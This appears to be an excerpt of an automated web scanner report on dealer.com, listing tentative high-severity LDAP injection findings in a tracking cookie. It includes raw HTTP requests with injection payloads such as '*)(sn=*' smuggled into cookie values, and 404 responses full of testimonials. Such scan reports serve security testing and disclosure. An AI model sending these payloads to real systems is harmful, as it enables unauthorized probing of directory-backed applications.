Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=c57a1dde651b3a70)(sn=*; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003110; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A3%3Bs%3A17%3A%22%2Fcompany%2Fcontact%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.54.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20260
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:21:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003319; expires=Mon, 16-Apr-2012 01:21:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http
...[SNIP]...

Request 2

GET /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/search-engine-optimization/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=c57a1dde651b3a70)!(sn=*; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003110; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A3%3Bs%3A17%3A%22%2Fcompany%2Fcontact%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.54.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20438
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003319; expires=Mon, 16-Apr-2012 01:21:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I really enjoy being able to go in and add a page, create the meta data for that page, and immediately have it show up. It has been tremendously helpful for us.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO
...[SNIP]...

1.10. http://www.dealer.com/products/sales-analytics/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/sales-analytics/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/sales-analytics/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/sales-analytics/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./solutions/agencies/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./solutions/oem/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003126; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Fsales-analytics%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.57.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20170
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Dealer.com's CarFlix videos impressed me a lot because I don't have to go to more than one vendor for my video. </p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
...[SNIP]...

Request 2

GET /products/sales-analytics/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/sales-analytics/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./solutions/agencies/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./solutions/oem/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003126; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Fsales-analytics%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.57.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20305
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdo
...[SNIP]...

1.11. http://www.dealer.com/solutions/agencies/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/agencies/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.55.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20166
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/inventory
...[SNIP]...

Request 2

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.55.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20125
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="C
...[SNIP]...

1.12. http://www.dealer.com/solutions/oem/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/oem/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads 405dbe54cabfaef5)(sn=* and 405dbe54cabfaef5)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /solutions/oem/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/oem/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=405dbe54cabfaef5)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003121; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.56.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19967
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
